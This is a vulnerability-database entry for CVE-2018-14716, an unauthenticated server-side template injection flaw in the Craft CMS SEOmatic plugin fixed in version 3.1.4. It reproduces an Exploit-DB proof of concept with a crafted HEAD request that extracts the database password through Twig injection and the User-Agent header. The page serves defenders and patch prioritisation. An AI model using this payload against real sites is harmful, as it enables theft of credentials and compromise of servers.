CVE-2018-14716
unknown
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
1.0
Description
SEOmatic plugin for Craft CMS SSTI Vulnerability
Predictions
Exploit likelihood
30%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
# Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
# Date: 2018-07-20
# Software Link: https://github.com/nystudio107/craft-seomatic
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
# CVE: CVE-2018-14716
# Category: webapps
# 1. Description
# An unauthenticated user can trigger the Twig template engine by injecting
# code into the URI as described in this article:
# http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/
# This can be leveraged to perform arbitrary calls against the template engine and the CMS.
# The output will be reflected within the Link header of the response.
# 2. Proof of Concept
# The injection can be performed against any part of the URL path. However as the framework is replacing
# control characters with HTML entities (e.g. ' ==> ') it is not possible to directly address methods with
# parameter values. Therefor it is required to bypass the filter by invoking functions such as craft.request.getUserAgent()
# and store the parameter values in the User-Agent header. In combination with Twig's slice() filter it is then possible
# to extract sensitive information by utilizing the craft.config.get() method:
# Request:
HEAD /db-password:%20%7b%25%20set%20dummy%20=%20craft.request.getUserAgent()|slice(0,8)%25%7d%7b%25%20set%20dummy2%20=%20craft.request.getUserAgent()|slice(9,2)%25%7d%7b%7bcraft.config.get(dummy,dummy2)%7d%7d HTTP/1.1
Host: craft-installation
User-Agent: password db
# Response:
HTTP/1.1 404 Not Found
Server: nginx
โฆ
Link: <db-password: SECRET>; rel='canonical'
โฆPackage impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Packagist | nystudio107/craft-seomatic | <3.1.4 | 3.1.4 |
References
- https://nvd.nist.gov/vuln/detail/CVE-2018-14716
- https://github.com/nystudio107/craft-seomatic/commit/1e7d1d084ac3a89e7ec70620f2749110508d1ce1
- https://github.com/nystudio107/craft-seomatic
- https://github.com/nystudio107/craft-seomatic/releases/tag/3.1.4
- https://twitter.com/nystudio107/status/1021847835418009605
- https://twitter.com/nystudio107/status/1021855169515057152
- https://www.exploit-db.com/exploits/45108
- http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.